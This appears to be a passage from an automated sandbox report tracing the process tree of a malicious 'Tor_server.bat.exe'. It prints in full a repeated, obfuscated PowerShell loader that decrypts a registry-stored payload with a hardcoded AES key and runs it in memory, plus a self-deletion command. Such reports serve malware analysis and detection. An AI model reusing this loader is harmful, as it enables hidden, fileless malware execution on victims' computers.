'')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:5584
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2644
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4352).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe" & del /f "C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe"
      4⤵
      PID:2096
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4872
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        5⤵
        Runs ping.exe
        
        PID:4724
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM "C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe"
        5⤵
        Kills process with taskkill
        
        PID:7080
    - - C:\Windows\system32\attrib.exe
        
        ATTRIB -h -s "C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe"
        5⤵
        Views/modifies file attributes
        
        PID:4384

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2736

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2520

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2512

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2480

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2288

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2156

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2004

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1664

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1544

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1536

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1304

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
